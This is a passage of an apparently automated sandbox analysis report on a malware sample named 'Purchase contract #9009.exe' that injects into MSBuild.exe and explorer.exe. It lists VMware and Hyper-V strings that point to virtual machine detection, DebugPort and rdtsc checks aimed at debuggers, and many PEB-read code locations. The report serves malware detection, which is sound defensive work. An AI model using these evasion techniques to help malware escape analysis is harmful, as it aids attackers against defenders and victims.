Source: explorer.exe, 00000005.00000000.687420389.000000000FCE0000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.681816397.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.678706314.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.681816397.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.681847888.000000000A64D000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAa
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.674285838.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.682069588.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Queries a list of all running processes

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_004088B0 rdtsc

4_2_004088B0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00409B20 LdrLoadDll,

4_2_00409B20

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CB944 mov eax, dword ptr fs:[00000030h]		4_2_015CB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CB944 mov eax, dword ptr fs:[00000030h]		4_2_015CB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AB171 mov eax, dword ptr fs:[00000030h]		4_2_015AB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AB171 mov eax, dword ptr fs:[00000030h]		4_2_015AB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AC962 mov eax, dword ptr fs:[00000030h]		4_2_015AC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h]		4_2_015A9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h]		4_2_015A9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h]		4_2_015A9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D513A mov eax, dword ptr fs:[00000030h]		4_2_015D513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D513A mov eax, dword ptr fs:[00000030h]		4_2_015D513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h]		4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h]		4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h]		4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h]		4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C4120 mov ecx, dword ptr fs:[00000030h]		4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016341E8 mov eax, dword ptr fs:[00000030h]		4_2_016341E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h]		4_2_015AB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h]		4_2_015AB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h]		4_2_015AB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h]		4_2_016649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h]		4_2_016649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h]		4_2_016649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h]		4_2_016649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016269A6 mov eax, dword ptr fs:[00000030h]		4_2_016269A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2990 mov eax, dword ptr fs:[00000030h]		4_2_015D2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DA185 mov eax, dword ptr fs:[00000030h]		4_2_015DA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016251BE mov eax, dword ptr fs:[00000030h]		4_2_016251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016251BE mov eax, dword ptr fs:[00000030h]		4_2_016251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016251BE mov eax, dword ptr fs:[00000030h]		4_2_016251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016251BE mov eax, dword ptr fs:[00000030h]		4_2_016251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CC182 mov eax, dword ptr fs:[00000030h]		4_2_015CC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D61A0 mov eax, dword ptr fs:[00000030h]		4_2_015D61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D61A0 mov eax, dword ptr fs:[00000030h]		4_2_015D61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C0050 mov eax, dword ptr fs:[00000030h]		4_2_015C0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C0050 mov eax, dword ptr fs:[00000030h]		4_2_015C0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01671074 mov eax, dword ptr fs:[00000030h]		4_2_01671074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01662073 mov eax, dword ptr fs:[00000030h]		4_2_01662073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]		4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]		4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]		4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]		4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h]		4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h]		4_2_015BB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h]		4_2_015BB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h]		4_2_015BB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h]		4_2_015BB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01674015 mov eax, dword ptr fs:[00000030h]		4_2_01674015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01674015 mov eax, dword ptr fs:[00000030h]		4_2_01674015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01627016 mov eax, dword ptr fs:[00000030h]		4_2_01627016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01627016 mov eax, dword ptr fs:[00000030h]		4_2_01627016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01627016 mov eax, dword ptr fs:[00000030h]		4_2_01627016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163B8D0 mov ecx, dword ptr fs:[00000030h]		4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h]		4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A58EC mov eax, dword ptr fs:[00000030h]		4_2_015A58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h]		4_2_015A40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h]		4_2_015A40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h]		4_2_015A40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A9080 mov eax, dword ptr fs:[00000030h]		4_2_015A9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DF0BF mov ecx, dword ptr fs:[00000030h]		4_2_015DF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DF0BF mov eax, dword ptr fs:[00000030h]		4_2_015DF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DF0BF mov eax, dword ptr fs:[00000030h]		4_2_015DF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01623884 mov eax, dword ptr fs:[00000030h]		4_2_01623884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01623884 mov eax, dword ptr fs:[00000030h]		4_2_01623884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E90AF mov eax, dword ptr fs:[00000030h]		4_2_015E90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]		4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]		4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]		4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]		4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]		4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h]		4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AF358 mov eax, dword ptr fs:[00000030h]		4_2_015AF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015ADB40 mov eax, dword ptr fs:[00000030h]		4_2_015ADB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D3B7A mov eax, dword ptr fs:[00000030h]		4_2_015D3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D3B7A mov eax, dword ptr fs:[00000030h]		4_2_015D3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015ADB60 mov ecx, dword ptr fs:[00000030h]		4_2_015ADB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01678B58 mov eax, dword ptr fs:[00000030h]		4_2_01678B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166131B mov eax, dword ptr fs:[00000030h]		4_2_0166131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016253CA mov eax, dword ptr fs:[00000030h]		4_2_016253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_016253CA mov eax, dword ptr fs:[00000030h]		4_2_016253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CDBE9 mov eax, dword ptr fs:[00000030h]		4_2_015CDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]		4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]		4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]		4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]		4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]		4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h]		4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01675BA5 mov eax, dword ptr fs:[00000030h]		4_2_01675BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2397 mov eax, dword ptr fs:[00000030h]		4_2_015D2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DB390 mov eax, dword ptr fs:[00000030h]		4_2_015DB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B1B8F mov eax, dword ptr fs:[00000030h]		4_2_015B1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B1B8F mov eax, dword ptr fs:[00000030h]		4_2_015B1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0165D380 mov ecx, dword ptr fs:[00000030h]		4_2_0165D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166138A mov eax, dword ptr fs:[00000030h]		4_2_0166138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h]		4_2_015D4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h]		4_2_015D4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h]		4_2_015D4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0165B260 mov eax, dword ptr fs:[00000030h]		4_2_0165B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0165B260 mov eax, dword ptr fs:[00000030h]		4_2_0165B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01678A62 mov eax, dword ptr fs:[00000030h]		4_2_01678A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h]		4_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h]		4_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h]		4_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h]		4_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E927A mov eax, dword ptr fs:[00000030h]		4_2_015E927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166EA55 mov eax, dword ptr fs:[00000030h]		4_2_0166EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_01634257 mov eax, dword ptr fs:[00000030h]		4_2_01634257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C3A1C mov eax, dword ptr fs:[00000030h]		4_2_015C3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h]		4_2_015A5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A5210 mov ecx, dword ptr fs:[00000030h]		4_2_015A5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h]		4_2_015A5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h]		4_2_015A5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AAA16 mov eax, dword ptr fs:[00000030h]		4_2_015AAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015AAA16 mov eax, dword ptr fs:[00000030h]		4_2_015AAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015B8A0A mov eax, dword ptr fs:[00000030h]		4_2_015B8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166AA16 mov eax, dword ptr fs:[00000030h]		4_2_0166AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0166AA16 mov eax, dword ptr fs:[00000030h]		4_2_0166AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E4A2C mov eax, dword ptr fs:[00000030h]		4_2_015E4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015E4A2C mov eax, dword ptr fs:[00000030h]		4_2_015E4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h]		4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2ACB mov eax, dword ptr fs:[00000030h]		4_2_015D2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015D2AE4 mov eax, dword ptr fs:[00000030h]		4_2_015D2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DD294 mov eax, dword ptr fs:[00000030h]		4_2_015DD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DD294 mov eax, dword ptr fs:[00000030h]		4_2_015DD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BAAB0 mov eax, dword ptr fs:[00000030h]		4_2_015BAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015BAAB0 mov eax, dword ptr fs:[00000030h]		4_2_015BAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015DFAB0 mov eax, dword ptr fs:[00000030h]		4_2_015DFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]		4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]		4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]		4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]		4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015A52A5 mov eax, dword ptr fs:[00000030h]		4_2_015A52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_015C7D50 mov eax, dword ptr fs:[00000030h]		4_2_015C7D50
